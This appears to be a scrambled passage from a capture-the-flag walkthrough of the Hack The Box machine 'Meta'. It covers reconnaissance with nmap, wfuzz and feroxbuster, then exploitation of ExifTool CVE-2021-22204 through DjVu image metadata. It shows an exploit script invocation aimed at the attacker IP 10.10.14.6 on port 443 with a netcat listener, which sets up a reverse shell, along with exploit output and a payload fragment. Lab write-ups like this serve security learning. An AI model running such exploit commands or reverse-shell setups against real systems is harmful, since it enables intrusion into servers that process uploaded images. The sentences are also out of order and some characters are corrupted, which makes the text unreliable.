It’s running /usr/local/bin/convert_images.Building wheel for python-djvulibre (setup.py). I’ll start nc listening on 443, and upload this new image. SUCCESS: Exploit image written to "image.jpg" PREPARE: Exiftool config written to file! PAYLOAD: (metadata "\c$ ")ĭEPENDS: Dependencies for exploit are met!
UNICORD: Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution Putting something that looks like the following into the DjVu metadata will cause exiftool to run ` date` and show the output in the python /opt/exploit-CVE-2021-22204/exploit-CVE-2021-22204.py -s 10.10.14.6 443 This allows high-quality, readable images to be stored in a minimum of space, so that they can be made available on the web. It uses technologies such as image layer separation of text and background/images, progressive loading, arithmetic coding, and lossy compression for bitonal ( monochrome) images. The vulnerability is located in a branch of the script that parses DjVu files, which are:Ī computer file format designed primarily to store scanned documents, especially those containing a combination of text, line drawings, indexed color images, and photographs. This blog post by the researcher who discovered the vulnerability shows the details and how it was discovered (it’s a really interesting read).Įxiftool is actually written in Perl. It’s being submitted to GitLab, but it turns out to be a vulnerability in exiftool. Having recognized exiftool in use, some Googling for “exiftool CVE” returns this HackerOne report. Shell as www-data Exiftool Exploit CVE-2021-22204 Background If I hadn’t of recognized the page was using exiftool earlier, this would be a good signal. That file does exist at /metaview/lib/ExifToolWrapper.php, but it just returns a blank page (typically of PHP included files). I’ll check for composer.json files, and find one at /metaview/composer.json: It also shows composer, which is a PHP package manager. In general I’d want to keep that in mind, though it won’t come into play for Meta. The uploads directory is most interesting. Since it didn’t find /metaview, I’ll scan that one feroxbuster -u -x php This is a subset of the data that I get when I run exiftool on the same feroxbuster -u -x php If I give it a file, it returns some metadata about the file: The link goes to /metaview/, which is an app that returns metadata about an image: This is a very plain site, which lists “applications in development”: It finds some basic folders, as well as an Apache server-status page. ? Press to use the Scan Management Menu™ ? Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
I’ll add -hh 0 to hide responses with 0 characters, and run again.
I’ll start it with no filtering, and see that the default response is 0 lines, 0 words, 0 characters. Given the use of domain names, I’ll fuzz for subdomains using virtual host routing using wfuzz. nmap also identifies that the root is a redirect to artcorp.htb. Nmap done: 1 IP address (1 host up) scanned in 10.08 secondsīased on the OpenSSH version, the host is likely running Debian 10 buster. Service Info: OS: Linux CPE: cpe:/o:linux:linux_kernel |_http-title: Did not follow redirect to